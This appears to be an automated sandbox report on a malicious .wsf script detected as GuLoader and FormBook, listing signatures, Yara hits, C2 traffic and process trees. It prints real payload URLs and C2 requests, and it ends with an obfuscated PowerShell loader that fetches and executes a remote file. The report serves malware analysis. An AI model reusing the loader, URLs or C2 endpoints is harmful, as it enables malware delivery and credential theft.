Windows Analysis Report
CDS AC 661171855-VN1 SOA.wsf

Overview

General Information

Sample name: CDS AC 661171855-VN1 SOA.wsf
Analysis ID: 1432342
MD5: 7700a37bbfb2243c94b721449cc69b7f
SHA1: bc4e02172bfd1b919672b7480a8ddc5ad439ce9a
SHA256: 655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7
Tags: wsf
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose, 13_2_02D0B6B0

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\recover.exe Code function: 4x nop then xor eax, eax 13_2_02CF9330
Source: C:\Windows\SysWOW64\recover.exe Code function: 4x nop then pop edi 13_2_02D01C1B
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /domkapitler.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AKaUDBTG140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jackcliu.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.smartfindsdepot.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.barpa.be
Source: global traffic DNS traffic detected: DNS query: www.jackcliu.com
Source: global traffic DNS traffic detected: DNS query: www.smartfindsdepot.shop
Source: unknown HTTP traffic detected: POST /u88q/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.smartfindsdepot.shopOrigin: http://www.smartfindsdepot.shopContent-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.smartfindsdepot.shop/u88q/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 6b 56 53 62 56 71 48 4f 6b 6a 70 78 75 6f 7a 78 38 5a 39 6b 4a 78 77 7a 30 69 39 6e 68 53 53 4a 44 65 74 57 51 47 6d 46 46 49 2f 77 64 63 75 4c 64 49 34 4a 43 47 57 52 72 67 44 6b 75 43 67 46 49 75 74 47 31 52 56 4b 72 52 37 74 55 70 46 6a 34 64 73 70 54 2b 54 31 4e 4f 31 70 6a 4f 5a 53 6d 69 4e 54 59 32 37 6e 48 54 2b 69 53 32 75 6c 75 5a 59 58 75 6a 35 38 69 68 58 71 73 37 58 4b 6f 79 74 36 43 6e 34 58 61 71 43 31 37 53 46 52 61 35 65 61 57 71 59 34 51 7a 7a 58 37 36 44 73 42 33 58 65 72 4a 74 54 6f 6e 72 31 79 4b 5a 71 59 51 36 4d 64 4b 4d 45 6a 73 61 54 66 41 57 Data Ascii: JD1x=IlYeJSLU3UGOMkVSbVqHOkjpxuozx8Z9kJxwz0i9nhSSJDetWQGmFFI/wdcuLdI4JCGWRrgDkuCgFIutG1RVKrR7tUpFj4dspT+T1NO1pjOZSmiNTY27nHT+iS2uluZYXuj58ihXqs7XKoyt6Cn4XaqC17SFRa5eaWqY4QzzX76DsB3XerJtTonr1yKZqYQ6MdKMEjsaTfAW
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 19:57:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163//
Source: wab.exe, 0000000A.00000002.2632499102.000000001F2F0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin/
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.binb
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin~OU
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/domkapitler.msiP
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/domkapitler.msiXR
Source: powershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: powershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microv
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartfindsdepot.shop
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartfindsdepot.shop/u88q/
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: recover.exe, 0000000D.00000003.3123298265.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7108.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_1364.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Call Blgfrugts.ShellExecute("P" & alphameric & ".e" + "xe", Sgeord, "", "", Universitetslektorer)
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3327
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3327
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3327 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3327 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g 